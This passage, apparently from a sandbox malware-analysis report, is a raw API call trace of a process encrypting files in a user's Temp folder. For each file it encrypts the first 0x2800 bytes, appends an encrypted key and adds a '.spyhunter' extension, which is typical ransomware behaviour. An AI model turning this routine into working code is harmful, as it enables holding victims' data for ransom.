hHeap=0x2c0000) returned 1 [0139.385] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f128 | out: pbBuffer=0x270f128) returned 1 [0139.385] GetProcessHeap () returned 0x2c0000 [0139.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.415] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f120*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f120*=0x30) returned 1 [0139.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.415] GetProcessHeap () returned 0x2c0000 [0139.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.415] GetProcessHeap () returned 0x2c0000 [0139.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c130 | out: hHeap=0x2c0000) returned 1 [0139.415] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f128 | out: pbBuffer=0x270f128) returned 1 [0139.415] GetProcessHeap () returned 0x2c0000 [0139.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.415] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f120*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f120*=0x30) returned 1 [0139.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\spBUG102Rx3ynu0.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\spbug102rx3ynu0.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\spBUG102Rx3ynu0.png") returned 72 [0139.416] StrStrW (lpFirst="spBUG102Rx3ynu0.png", lpSrch=".txt") returned 0x0 [0139.416] GetProcessHeap () returned 0x2c0000 [0139.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.416] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0e4*=0x2800, lpOverlapped=0x0) returned 1 [0139.417] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.417] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f0e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0e4*=0x2800, lpOverlapped=0x0) returned 1 [0139.417] GetProcessHeap () returned 0x2c0000 [0139.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.417] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.417] WriteFile (in: hFile=0xb4, lpBuffer=0x270f124*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0e4, lpOverlapped=0x0 | out: lpBuffer=0x270f124*, lpNumberOfBytesWritten=0x270f0e4*=0x4, lpOverlapped=0x0) returned 1 [0139.417] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270f0e4*=0x30, lpOverlapped=0x0) returned 1 [0139.417] CloseHandle (hObject=0xb4) returned 1 [0139.417] GetProcessHeap () returned 0x2c0000 [0139.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.417] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\spBUG102Rx3ynu0.png.spyhunter") returned 82 [0139.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\spBUG102Rx3ynu0.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\spbug102rx3ynu0.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\spBUG102Rx3ynu0.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\spbug102rx3ynu0.png.spyhunter")) returned 1 [0139.418] GetProcessHeap () returned 0x2c0000 [0139.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.418] GetProcessHeap () returned 0x2c0000 [0139.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.418] GetProcessHeap () returned 0x2c0000 [0139.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5038 | out: hHeap=0x2c0000) returned 1 [0139.419] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f120 | out: pbBuffer=0x270f120) returned 1 [0139.419] GetProcessHeap () returned 0x2c0000 [0139.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.419] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f118*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f118*=0x30) returned 1 [0139.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Q0em99I7V.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\q0em99i7v.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.419] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Q0em99I7V.doc") returned 66 [0139.419] StrStrW (lpFirst="Q0em99I7V.doc", lpSrch=".txt") returned 0x0 [0139.419] GetProcessHeap () returned 0x2c0000 [0139.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.419] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0dc*=0x187c, lpOverlapped=0x0) returned 1 [0139.420] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffe784, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.420] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x187c, lpNumberOfBytesWritten=0x270f0dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0dc*=0x187c, lpOverlapped=0x0) returned 1 [0139.420] GetProcessHeap () returned 0x2c0000 [0139.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.420] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.420] WriteFile (in: hFile=0xb4, lpBuffer=0x270f11c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0dc, lpOverlapped=0x0 | out: lpBuffer=0x270f11c*, lpNumberOfBytesWritten=0x270f0dc*=0x4, lpOverlapped=0x0) returned 1 [0139.420] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270f0dc*=0x30, lpOverlapped=0x0) returned 1 [0139.421] CloseHandle (hObject=0xb4) returned 1 [0139.421] GetProcessHeap () returned 0x2c0000 [0139.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.421] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Q0em99I7V.doc.spyhunter") returned 76 [0139.421] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Q0em99I7V.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\q0em99i7v.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Q0em99I7V.doc.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\q0em99i7v.doc.spyhunter")) returned 1 [0139.422] GetProcessHeap () returned 0x2c0000 [0139.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.422] GetProcessHeap () returned 0x2c0000 [0139.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.422] GetProcessHeap () returned 0x2c0000 [0139.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08888 | out: hHeap=0x2c0000) returned 1 [0139.422] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f120 | out: pbBuffer=0x270f120) returned 1 [0139.422] GetProcessHeap () returned 0x2c0000 [0139.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.422] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f118*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f118*=0x30) returned 1 [0139.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P9xDN4U9kyHC5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p9xdn4u9kyhc5.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P9xDN4U9kyHC5.bmp") returned 70 [0139.423] StrStrW (lpFirst="P9xDN4U9kyHC5.bmp", lpSrch=".txt") returned 0x0 [0139.423] GetProcessHeap () returned 0x2c0000 [0139.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.423] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0dc*=0x2800, lpOverlapped=0x0) returned 1 [0139.424] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.424] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f0dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0dc*=0x2800, lpOverlapped=0x0) returned 1 [0139.424] GetProcessHeap () returned 0x2c0000 [0139.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.424] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.424] WriteFile (in: hFile=0xb4, lpBuffer=0x270f11c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0dc, lpOverlapped=0x0 | out: lpBuffer=0x270f11c*, lpNumberOfBytesWritten=0x270f0dc*=0x4, lpOverlapped=0x0) returned 1 [0139.425] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270f0dc*=0x30, lpOverlapped=0x0) returned 1 [0139.425] CloseHandle (hObject=0xb4) returned 1 [0139.425] GetProcessHeap () returned 0x2c0000 [0139.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.425] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P9xDN4U9kyHC5.bmp.spyhunter") returned 80 [0139.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P9xDN4U9kyHC5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p9xdn4u9kyhc5.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P9xDN4U9kyHC5.bmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p9xdn4u9kyhc5.bmp.spyhunter")) returned 1 [0139.426] GetProcessHeap () returned 0x2c0000 [0139.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.426] GetProcessHeap () returned 0x2c0000 [0139.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.426] GetProcessHeap () returned 0x2c0000 [0139.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81030 | out: hHeap=0x2c0000) returned 1 [0139.426] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f118 | out: pbBuffer=0x270f118) returned 1 [0139.426] GetProcessHeap () returned 0x2c0000 [0139.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.426] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f110*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f110*=0x30) returned 1 [0139.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\p0yUd01PcAIuQPtn0DfI.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p0yud01pcaiuqptn0dfi.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.427] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\p0yUd01PcAIuQPtn0DfI.doc") returned 77 [0139.427] StrStrW (lpFirst="p0yUd01PcAIuQPtn0DfI.doc", lpSrch=".txt") returned 0x0 [0139.427] GetProcessHeap () returned 0x2c0000 [0139.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.427] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0d4*=0x2800, lpOverlapped=0x0) returned 1 [0139.428] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.428] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f0d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0d4*=0x2800, lpOverlapped=0x0) returned 1 [0139.428] GetProcessHeap () returned 0x2c0000 [0139.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.428] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.428] WriteFile (in: hFile=0xb4, lpBuffer=0x270f114*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0d4, lpOverlapped=0x0 | out: lpBuffer=0x270f114*, lpNumberOfBytesWritten=0x270f0d4*=0x4, lpOverlapped=0x0) returned 1 [0139.428] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270f0d4*=0x30, lpOverlapped=0x0) returned 1 [0139.428] CloseHandle (hObject=0xb4) returned 1 [0139.428] GetProcessHeap () returned 0x2c0000 [0139.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.428] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\p0yUd01PcAIuQPtn0DfI.doc.spyhunter") returned 87 [0139.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\p0yUd01PcAIuQPtn0DfI.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p0yud01pcaiuqptn0dfi.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\p0yUd01PcAIuQPtn0DfI.doc.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p0yud01pcaiuqptn0dfi.doc.spyhunter")) returned 1 [0139.429] GetProcessHeap () returned 0x2c0000 [0139.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.429] GetProcessHeap () returned 0x2c0000 [0139.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.429] GetProcessHeap () returned 0x2c0000 [0139.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2eca8 | out: hHeap=0x2c0000) returned 1 [0139.430] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f118 | out: pbBuffer=0x270f118) returned 1 [0139.430] GetProcessHeap () returned 0x2c0000 [0139.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.430] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f110*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f110*=0x30) returned 1 [0139.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\p-lDxj2zUuXa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ldxj2zuuxa.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\p-lDxj2zUuXa.png") returned 69 [0139.430] StrStrW (lpFirst="p-lDxj2zUuXa.png", lpSrch=".txt") returned 0x0 [0139.430] GetProcessHeap () returned 0x2c0000 [0139.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.430] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0d4*=0x2800, lpOverlapped=0x0) returned 1 [0139.431] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.431] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f0d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0d4*=0x2800, lpOverlapped=0x0) returned 1 [0139.431] GetProcessHeap () returned 0x2c0000 [0139.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.432] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.432] WriteFile (in: hFile=0xb4, lpBuffer=0x270f114*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0d4, lpOverlapped=0x0 | out: lpBuffer=0x270f114*, lpNumberOfBytesWritten=0x270f0d4*=0x4, lpOverlapped=0x0) returned 1 [0139.432] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270f0d4*=0x30, lpOverlapped=0x0) returned 1 [0139.432] CloseHandle (hObject=0xb4) returned 1 [0139.433] GetProcessHeap () returned 0x2c0000 [0139.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.433] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\p-lDxj2zUuXa.png.spyhunter") returned 79 [0139.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\p-lDxj2zUuXa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ldxj2zuuxa.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\p-lDxj2zUuXa.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ldxj2zuuxa.png.spyhunter")) returned 1 [0139.434] GetProcessHeap () returned 0x2c0000 [0139.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.434] GetProcessHeap () returned 0x2c0000 [0139.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.434] GetProcessHeap () returned 0x2c0000 [0139.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80f58 | out: hHeap=0x2c0000) returned 1 [0139.434] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f110 | out: pbBuffer=0x270f110) returned 1 [0139.434] GetProcessHeap () returned 0x2c0000 [0139.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.434] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f108*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f108*=0x30) returned 1 [0139.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oyyOY3R1O1Sz23.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\oyyoy3r1o1sz23.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.435] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oyyOY3R1O1Sz23.swf") returned 71 [0139.435] StrStrW (lpFirst="oyyOY3R1O1Sz23.swf", lpSrch=".txt") returned 0x0 [0139.435] GetProcessHeap () returned 0x2c0000 [0139.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.435] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0cc*=0x2800, lpOverlapped=0x0) returned 1 [0139.435] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.435] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f0cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0cc*=0x2800, lpOverlapped=0x0) returned 1 [0139.436] GetProcessHeap () returned 0x2c0000 [0139.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.436] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.436] WriteFile (in: hFile=0xb4, lpBuffer=0x270f10c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0cc, lpOverlapped=0x0 | out: lpBuffer=0x270f10c*, lpNumberOfBytesWritten=0x270f0cc*=0x4, lpOverlapped=0x0) returned 1 [0139.436] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270f0cc*=0x30, lpOverlapped=0x0) returned 1 [0139.436] CloseHandle (hObject=0xb4) returned 1 [0139.436] GetProcessHeap () returned 0x2c0000 [0139.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.436] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oyyOY3R1O1Sz23.swf.spyhunter") returned 81 [0139.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oyyOY3R1O1Sz23.swf" 